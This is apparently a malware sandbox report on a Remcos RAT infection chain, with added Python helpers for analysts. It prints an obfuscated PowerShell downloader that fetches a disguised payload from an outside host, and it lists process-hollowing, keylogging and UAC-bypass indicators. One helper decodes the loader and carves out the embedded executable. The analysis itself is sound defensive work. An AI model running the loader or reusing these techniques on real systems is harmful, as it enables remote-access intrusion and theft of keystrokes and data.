                Source: Yara matchFile source: 0000000E.00000002.620697128.0000000000541000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.512511300.0000000003E99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2772, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 2780, type: MEMORYSTR

                System Summary

                barindex
                Source: 14.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 14.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 14.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 14.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 14.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 14.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 13.2.powershell.exe.41beb20.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 13.2.powershell.exe.41beb20.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 13.2.powershell.exe.41beb20.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 13.2.powershell.exe.41beb20.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 13.2.powershell.exe.41beb20.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 13.2.powershell.exe.41beb20.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 0000000D.00000002.512511300.0000000003E99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: Process Memory Space: powershell.exe PID: 3084, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 2772, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: Process Memory Space: powershell.exe PID: 2772, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: RegAsm.exe PID: 2780, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FFA95D3F.doc, type: DROPPEDMatched rule: Detects RTF documents with non-standard version and embedding one of the objects mostly observed in exploit documents. Author: ditekSHen
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\sweettastedbananabuttersmoothchcolcatebutterrichcontenttokeepsmoothbutterchocolatebuntogetmesweetgirl________yummybutterchocolatesmoothheret[1].doc, type: DROPPEDMatched rule: Detects RTF documents with non-standard version and embedding one of the objects mostly observed in exploit documents. Author: ditekSHen
                Source: RFQ No. 109078906v.xla.xlsxOLE: Microsoft Excel 2007+
                Source: 9EC30000.0.drOLE: Microsoft Excel 2007+
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\FoNVg0.url
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\zhort.de.url
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: Commandline size = 9438
                Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgID
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? 
? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?E
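The powershell.exe launch above carries the first stage as a `$Codigo` string in which the sandbox has replaced every character it could not render with a run of five question marks. Substituting the letter A for each run (an inference from the result decoding to valid UTF-16LE PowerShell; the loader's own replace call is not visible on this page) yields a script that downloads the archive.org vbs.jpg URL listed in the strings section above and cuts a base64 blob out of it between a `<<BASE64_START>>` marker and an end marker the report truncates at `<<BASE64_E`. The following is an added triage helper, not code from the report or from the malware: it decodes the visible prefix of the stage-1 string, pulls the download URL out of it, and carves the embedded payload from a constructed stand-in for the downloaded file. The placeholder-to-A mapping, `<<BASE64_END>>` as the closing marker and the sample image bytes are assumptions.

```python
import base64
import re

# The sandbox prints a run of five question marks wherever the original command
# line held characters it could not render. Assumption (inferred, not shown on
# the page): the loader maps each such run back to the letter "A" before calling
# FromBase64String, which is the substitution that makes the text decode to
# valid UTF-16LE PowerShell.
PLACEHOLDER = re.compile(r"\? \? \? \? \?")

# Verbatim prefix of the $Codigo value as rendered in the report above.
SAMPLE_STAGE1 = (
    "J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw"
    "? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ"
    "? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8"
    "? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE"
    "? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4"
    "? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ"
    "? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?"
)

START_MARKER = b"<<BASE64_START>>"  # literal visible in the decoded script
END_MARKER = b"<<BASE64_END>>"      # assumption: the report cuts the string off at "<<BASE64_E"

URL_RE = re.compile(r"https?://[^\s'\"]+")


def decode_stage1(mangled: str) -> str:
    """Reverse the placeholder substitution and decode the UTF-16LE PowerShell text."""
    b64 = PLACEHOLDER.sub("A", mangled)
    return base64.b64decode(b64, validate=True).decode("utf-16-le")


def extract_urls(script: str) -> list:
    """Download URLs referenced by the decoded stage."""
    return URL_RE.findall(script)


def carve_payload(image_bytes: bytes, start: bytes = START_MARKER, end: bytes = END_MARKER) -> bytes:
    """Cut the base64 text between the two markers out of the downloaded 'image'
    and decode it, mirroring what the stage-1 script does after DownloadData."""
    s = image_bytes.find(start)
    if s < 0:
        raise ValueError("start marker not present")
    s += len(start)
    e = image_bytes.find(end, s)
    if e < 0:
        raise ValueError("end marker not present")
    return base64.b64decode(image_bytes[s:e], validate=True)


def looks_like_pe(blob: bytes) -> bool:
    """True when the carved payload starts with a DOS/PE 'MZ' header."""
    return blob[:2] == b"MZ"


# Constructed stand-in for vbs.jpg: JPEG-looking bytes wrapping a base64 blob whose
# decoded form starts with an MZ header, as the Yara hits on the PowerShell process
# memory (13.2.powershell.exe.41beb20.1.unpack) indicate for the real sample.
SAMPLE_IMAGE = (
    b"\xff\xd8\xff\xe0" + b"\x00" * 12
    + START_MARKER
    + base64.b64encode(b"MZ\x90\x00" + b"\x00" * 60 + b"PE\x00\x00")
    + END_MARKER
    + b"\xff\xd9"
)

if __name__ == "__main__":
    script = decode_stage1(SAMPLE_STAGE1)
    print(script)
    print(extract_urls(script))
    payload = carve_payload(SAMPLE_IMAGE)
    print(len(payload), looks_like_pe(payload))
```

Running the decoder on the visible prefix gives `$imageUrl = 'https://ia803104.us.archive.org/`, which is the same host as the vbs.jpg string the report lifted from powershell.exe memory; feed the rest of the `$Codigo` value through `decode_stage1` to recover the full loader, and the real vbs.jpg through `carve_payload` to obtain the PE that the Yara rules matched inside PowerShell.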
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and write
                Source: C:\Windows\SysWOW64\wscript.exeMemory allocated: 770B0000 page execute and read and write
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 770B0000 page execute and read and write
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 770B0000 page execute and read and write
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 770B0000 page execute and read and write
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 770B0000 page execute and read and write
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_004180EF GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,14_2_004180EF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_004132D2 OpenProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,GetFinalPathNameByHandleW,CloseHandle,CreateFileMappingW,MapViewOfFile,GetFileSize,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle,14_2_004132D2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0041BB09 OpenProcess,NtSuspendProcess,CloseHandle,14_2_0041BB09
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0041BB35 OpenProcess,NtResumeProcess,CloseHandle,14_2_0041BB35
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,15_2_0040DD85
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00401806 NtdllDefWindowProc_W,15_2_00401806
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_004018C0 NtdllDefWindowProc_W,15_2_004018C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_004016FD NtdllDefWindowProc_A,17_2_004016FD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_004017B7 NtdllDefWindowProc_A,17_2_004017B7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 18_2_00402CAC NtdllDefWindowProc_A,18_2_00402CAC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 18_2_00402D66 NtdllDefWindowProc_A,18_2_00402D66
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_004167B4 ExitWindowsEx,LoadLibraryA,GetProcAddress,14_2_004167B4
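The records with named APIs in this and the capturing section above are the report's evidence for the RAT's capabilities: 14_2_0040A2B8 installs a Windows hook with idHook 0x0000000D, which is WH_KEYBOARD_LL (a low-level keyboard hook); 14_2_0040A3E0 pairs GetForegroundWindow, GetKeyboardState and ToUnicodeEx to turn captured key state into characters; 14_2_0040B70E reads the clipboard; and 14_2_004180EF runs CreateProcessW, GetThreadContext, NtUnmapViewOfSection, WriteProcessMemory, SetThreadContext and ResumeThread, the classic process-hollowing sequence behind the RegAsm.exe injection. The following added example (mine, not part of the Joe Sandbox report) parses such "Code function" records and tags each function with the capability its API set implies, so a long report can be reduced to the few functions worth opening in a disassembler. The capability rule sets are my own; the sample records are copied from this report.

```python
import re
from typing import Dict, List, Optional, Set, Tuple

# One Joe Sandbox "Code function" record: the function id, the comma-separated API
# calls (a call may carry space-separated hex arguments), then the id repeated.
RECORD_RE = re.compile(
    r"Code function: (?P<fid>\d+_\d+_[0-9A-Fa-f]{8}) (?P<body>.*?)(?P=fid)\s*$"
)
HEX_ARG_RE = re.compile(r"[0-9A-Fa-f]{8}")
NAME_RE = re.compile(r"[A-Za-z_][A-Za-z0-9_]*")

# SetWindowsHookEx idHook values that mean keystroke interception.
WH_KEYBOARD = 2
WH_KEYBOARD_LL = 13

# Capability rules (my own, not the sandbox's signatures): a function gets the tag
# when its API set contains every name in the rule.
CAPABILITIES: Dict[str, Set[str]] = {
    "keystroke_capture": {"GetForegroundWindow", "GetKeyboardState", "ToUnicodeEx"},
    "clipboard_read": {"OpenClipboard", "GetClipboardData"},
    "clipboard_write": {"EmptyClipboard", "SetClipboardData"},
    "process_hollowing": {
        "CreateProcessW", "GetThreadContext", "NtUnmapViewOfSection",
        "WriteProcessMemory", "SetThreadContext", "ResumeThread",
    },
}


def parse_record(line: str) -> Optional[Tuple[str, List[str], List[int]]]:
    """Return (function id, API names in call order, SetWindowsHookEx idHook values)."""
    m = RECORD_RE.search(line)
    if not m:
        return None
    apis: List[str] = []
    hook_ids: List[int] = []
    for call in m.group("body").split(","):
        parts = call.split()
        # Skip the empty trailing field and bare hex arguments such as 0040A2A4.
        if not parts or HEX_ARG_RE.fullmatch(parts[0]) or not NAME_RE.fullmatch(parts[0]):
            continue
        apis.append(parts[0])
        if parts[0] in ("SetWindowsHookExA", "SetWindowsHookExW") and len(parts) > 1:
            hook_ids.append(int(parts[1], 16))
    return m.group("fid"), apis, hook_ids


def classify(apis: List[str], hook_ids: List[int]) -> Set[str]:
    """Capability tags implied by one function's API set."""
    present = set(apis)
    tags = {cap for cap, needed in CAPABILITIES.items() if needed <= present}
    if any(h in (WH_KEYBOARD, WH_KEYBOARD_LL) for h in hook_ids):
        tags.add("keyboard_hook")
    return tags


def triage(lines: List[str]) -> Dict[str, Set[str]]:
    """Map every tagged function id to its capability tags; untagged ones are dropped."""
    result: Dict[str, Set[str]] = {}
    for line in lines:
        rec = parse_record(line)
        if rec is None:
            continue
        fid, apis, hook_ids = rec
        tags = classify(apis, hook_ids)
        if tags:
            result[fid] = tags
    return result


# Sample input copied from the report records above (raw strings keep the backslashes).
SAMPLE_LINES = [
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0040A2B8 SetWindowsHookExA 0000000D,0040A2A4,0000000014_2_0040A2B8",
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0040B70E OpenClipboard,GetClipboardData,CloseClipboard,14_2_0040B70E",
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0040A3E0 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,14_2_0040A3E0",
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_004180EF GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,14_2_004180EF",
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00401806 NtdllDefWindowProc_W,15_2_00401806",
]

if __name__ == "__main__":
    for fid, tags in sorted(triage(SAMPLE_LINES).items()):
        print(fid, ", ".join(sorted(tags)))
```

Paste the whole "Code function" list of a report into `SAMPLE_LINES` (or read it from a file) and the output is the short list of functions that implement keylogging, clipboard theft and hollowing; the rule sets are deliberately strict subsets, so extend `CAPABILITIES` rather than loosen them when a sample uses a variant API such as CreateProcessA or NtWriteVirtualMemory.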
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_0032CCEB9_2_0032CCEB
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_003227089_2_00322708
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_0032AD799_2_0032AD79
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_0032479E9_2_0032479E
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_001F4D5813_2_001F4D58
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_001F4D4813_2_001F4D48
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0043E0CC14_2_0043E0CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0041F0FA14_2_0041F0FA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0045415914_2_00454159
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0043816814_2_00438168
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_004461F014_2_004461F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0043E2FB14_2_0043E2FB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0045332B14_2_0045332B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0042739D14_2_0042739D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_004374E614_2_004374E6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0043E55814_2_0043E558
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0043877014_2_00438770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_004378FE14_2_004378FE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0043394614_2_00433946
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0044D9C914_2_0044D9C9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00427A4614_2_00427A46
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0041DB6214_2_0041DB62
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00427BAF14_2_00427BAF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00437D3314_2_00437D33
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00435E5E14_2_00435E5E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00426E0E14_2_00426E0E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0043DE9D14_2_0043DE9D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00413FCA14_2_00413FCA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00436FEA14_2_00436FEA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_1001719414_2_10017194
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_1000B5C114_2_1000B5C1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0044B04015_2_0044B040
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0043610D15_2_0043610D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0044731015_2_00447310
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0044A49015_2_0044A490
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0040755A15_2_0040755A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0043C56015_2_0043C560
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0044B61015_2_0044B610
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0044D6C015_2_0044D6C0
                Source: RFQ No. 109078906v.xla.xlsx OLE indicator, VBA macros: true
                Source: ~WRF{03652721-936B-412E-9DA4-9599756B16B0}.tmp.4.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                Source: 14.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
